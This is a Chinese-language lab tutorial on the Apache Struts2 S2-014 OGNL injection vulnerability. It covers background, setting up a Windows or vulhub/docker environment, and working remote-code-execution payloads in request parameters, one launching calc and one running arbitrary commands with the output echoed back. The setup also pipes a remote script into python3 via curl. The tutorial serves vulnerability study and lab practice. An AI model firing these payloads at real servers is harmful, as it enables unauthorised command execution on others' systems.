Struts-S2-014漏洞利用(含环境搭建、含POC)

struts-s2-014

此文仅供大家交流学习,严禁非法使用

一、参考网址:

http://struts.apache.org/docs/s2-014.html
https://github.com/phith0n/vulhub/tree/master/struts2/s2-013

二、 影响版本:

S2-014 是对 S2-013 修复的加强,在 S2-013 修复的代码中忽略了 ${ognl_exp} OGNL 表达式执行的方式,因此 S2-014 是对其的补丁加强。

三、 漏洞介绍:

无论是S:URL和S:一个标签提供includeParams属性。
该属性的主要范围是了解是否包括http请求参数。
includeParams的允许值为:
无 - 在URL中不包含参数(默认)
get - 仅在URL中包含GET参数
all - 在URL中包含GET和POST参数
包含特制请求参数的请求可用于将任意OGNL代码注入到堆栈中,之后用作URL或A标签的请求参数,这将进一步评估。
当URL / A标签尝试解析原始请求中存在的每个参数时,会发生第二个评估。
这使得恶意用户将任意的OGNL语句放入任何请求参数(不一定由代码管理),并将其评估为OGNL表达式,以启用方法执行并执行任意方法,绕过Struts和OGNL库保护。
这个问题最初由Struts 2.3.14.1和安全公告S2-013处理。然而,2.3.14.1引入的解决方案没有解决所有可能的攻击向量,因此2.3.14.2之前的每个版本的Struts 2仍然容易受到这种攻击。

此漏洞相对于S2-013来说,前者参数必须为后台代码指定参数,但后者为任意参数,大大增强了漏洞被攻破的可能性

四、 环境搭建:

(windows)

  • 下载/struts/2.1.6

下载地址:http://archive.apache.org/dist/struts/binaries/struts-2.1.6-apps.zip

  • 下载安装xampp

  • 部署showcase

  • 解压

2.1.6_1.png

2.1.6_2.png
  • 复制到.
2.1.6_3.png
  • 重启tomcat
2.1.6_4.png
  • 已成功自动部署
2.1.6_5.png
  • 修改配置
    在Struts Blank应用程序中打开HelloWorld.jsp,并将以下参数添加到url / a标签之一:
    includeParams="all"
    这样一来,这条线将会是这样的:
    <s:url id="url" action="HelloWorld" includeParams="all">
    运行struts2-blank应用程序

环境搭建:(ubuntu)

curl -s https://bootstrap.pypa.io/get-pip.py | python3

  • 安装docker
    apt-get update && apt-get install docker.io

  • 启动docker服务
    service docker start

  • 安装compose
    pip install docker-compose

注意要先ssh连接,将公钥添加到github上,具体参照网上教程

  • 拉取项目
    git clone git@github.com:phith0n/vulhub.git
    cd vulhub

  • 进入某一个漏洞/环境的目录
    cd nginx_php5_mysql

  • 自动化编译环境
    docker-compose build

  • 启动整个环境
    docker-compose up -d

五、 POC:

aaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}

六、 测试网址:

原始网址:

http://ip:8080/struts2-blank-2.1.6/example/HelloWorld.action

修改后网址;

http://ip:8080/struts2-blank-2.1.6/example/HelloWorld.action?url=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}

执行结果为打开本地计算器应用

任意可执行命令POC:

aaaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23cmd="ipconfig",%23ret=@java.lang.Runtime@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[500],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%23out=@org.apache.struts2.ServletActionContext@getResponse(),%23out.getWriter().println(%23echo)%7D

七、执行结果

1.png

注意根据需求更改res大小

八、 至此,该漏洞基本利用完毕

本人还是一个未毕业的小萌新,希望大家多多帮助,有问题请发送邮件到xrzsupupup@163.com不胜感激,我也会尽量去帮助大家

坚决做一名白帽子

推荐阅读更多精彩内容